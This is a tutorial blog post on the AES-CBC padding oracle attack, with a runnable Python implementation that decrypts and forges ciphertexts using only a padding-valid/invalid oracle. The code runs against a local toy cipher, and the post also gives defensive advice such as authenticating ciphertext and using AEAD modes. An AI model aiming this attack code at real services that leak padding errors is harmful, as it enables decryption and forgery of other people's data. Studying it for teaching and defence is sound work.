Thursday, October 21, 2010

AES CBC Padding Oracle Attack

What is a Padding Oracle?

AES-CBC with PKCS5 padding (the name Java uses; for AES's 16-byte block it is the same scheme as PKCS#7 padding) is one of the most widely deployed symmetric encryption constructions. Most AES-CBC implementations return an error when someone modifies the ciphertext and the modification produces invalid padding after decryption. That error return is the padding oracle. Any observable difference counts, not only an explicit "bad padding" message: a distinct HTTP status, a different log line, or a measurable timing difference between a padding failure and a later failure all leak the same bit. In pseudocode it looks like this:


bool PaddingOracle(ciphertext) // given any ciphertext, returns whether it decrypts to correctly padded plaintext


An attacker can use that single bit, block by block and byte by byte (at most 256 oracle queries per byte, about 128 on average), to construct a decryption oracle:


char *DecryptionOracle(ciphertext) // given any ciphertext, returns its plaintext


Worse yet, because CBC decryption XORs each block-cipher output with the previous ciphertext block, the attacker can turn the decryption oracle into an encryption oracle: choose the last ciphertext block freely, learn what the block cipher decrypts it to, and pick the preceding ciphertext block so that the XOR yields the wanted plaintext block, working backwards until the first chosen block becomes the IV:


char *EncryptionOracle(plaintext) // given any plaintext, returns a ciphertext that decrypts to it


In short, leaking the single bit of whether the padding was correct lets an attacker decrypt and encrypt arbitrary messages without ever learning the key. The fix is not a vaguer error message but a design that never acts on unauthenticated ciphertext: authenticate the ciphertext (encrypt-then-MAC, or an AEAD mode such as AES-GCM), reject tampered input before any padding is examined, and make that rejection indistinguishable in both response and timing so the check itself does not become the oracle.
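As an added, runnable illustration of both constructions above (this is example code written for this page, not code from the original post): a complete padding oracle attack that first recovers plaintext and then forges a ciphertext, using nothing but the true/false answer of the oracle. The attack never touches the block cipher itself, so a small keyed Feistel network built from SHA-256 stands in for AES (an assumption made so the example runs with the Python standard library only); replacing block_encrypt/block_decrypt with a real AES block call changes nothing in the attack code. The key, IV and messages are constructed for the demo.

```python
import hashlib

BLOCK = 16   # AES block size; the CBC and PKCS#7 logic below is what AES-CBC uses
ROUNDS = 8


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# Stand-in block cipher (assumption: a toy SHA-256 Feistel network, NOT AES).
def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in range(ROUNDS):
        left, right = right, xor(left, _f(key, rnd, right))
    return left + right


def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(ROUNDS)):
        left, right = xor(right, _f(key, rnd, left)), left
    return left + right


# PKCS#7 padding and CBC mode, as a typical library implements them.
def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    if not data or len(data) % BLOCK:
        raise ValueError("bad padding")
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    prev, out, padded = iv, [iv], pad(plaintext)
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)            # IV is prepended to the ciphertext


def cbc_decrypt(key: bytes, ciphertext: bytes) -> bytes:
    prev, out = ciphertext[:BLOCK], []
    for i in range(BLOCK, len(ciphertext), BLOCK):
        cur = ciphertext[i:i + BLOCK]
        out.append(xor(block_decrypt(key, cur), prev))
        prev = cur
    return unpad(b"".join(out))     # ValueError on bad padding: this is the leak


def make_padding_oracle(key: bytes):
    """bool PaddingOracle(ciphertext): the server's error behaviour, nothing else."""
    def oracle(ciphertext: bytes) -> bool:
        try:
            cbc_decrypt(key, ciphertext)
            return True
        except ValueError:
            return False
    return oracle


def recover_intermediate(oracle, target: bytes) -> bytes:
    """Recover block_decrypt(key, target) using only the oracle, last byte first."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        pad_val = BLOCK - pos
        forged = bytearray(BLOCK)
        for k in range(pos + 1, BLOCK):          # known bytes: force them to pad_val
            forged[k] = inter[k] ^ pad_val
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + target):
                continue
            if pos == BLOCK - 1:                 # rule out a lucky 02 02 (or longer) padding
                probe = bytearray(forged)
                probe[pos - 1] ^= 0xFF
                if not oracle(bytes(probe) + target):
                    continue
            inter[pos] = guess ^ pad_val
            break
        else:
            raise RuntimeError("oracle never accepted a guess")
    return bytes(inter)


def decrypt_with_oracle(oracle, ciphertext: bytes) -> bytes:
    """char *DecryptionOracle(ciphertext): P_i = D(C_i) xor C_{i-1}, with C_0 = IV."""
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b"".join(xor(recover_intermediate(oracle, cur), prev)
                     for prev, cur in zip(blocks, blocks[1:]))
    return unpad(plain)


def encrypt_with_oracle(oracle, plaintext: bytes) -> bytes:
    """char *EncryptionOracle(plaintext): pick C_n freely, then C_{i-1} = D(C_i) xor P_i."""
    padded = pad(plaintext)
    cur, chain = bytes(BLOCK), [bytes(BLOCK)]   # last ciphertext block is arbitrary
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        cur = xor(recover_intermediate(oracle, cur), padded[i:i + BLOCK])
        chain.append(cur)
    return b"".join(reversed(chain))            # the last block chosen becomes the IV
```

The probe on the final byte matters in practice: a guess that makes the last plaintext byte 0x02 is accepted whenever the byte before it already happens to be 0x02, so flipping the preceding byte and re-asking the oracle is what separates a real 0x01 from that coincidence. The forged ciphertext ends in an all-zero block by choice; any value works, because the attack learns what that block decrypts to and compensates in the block before it.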
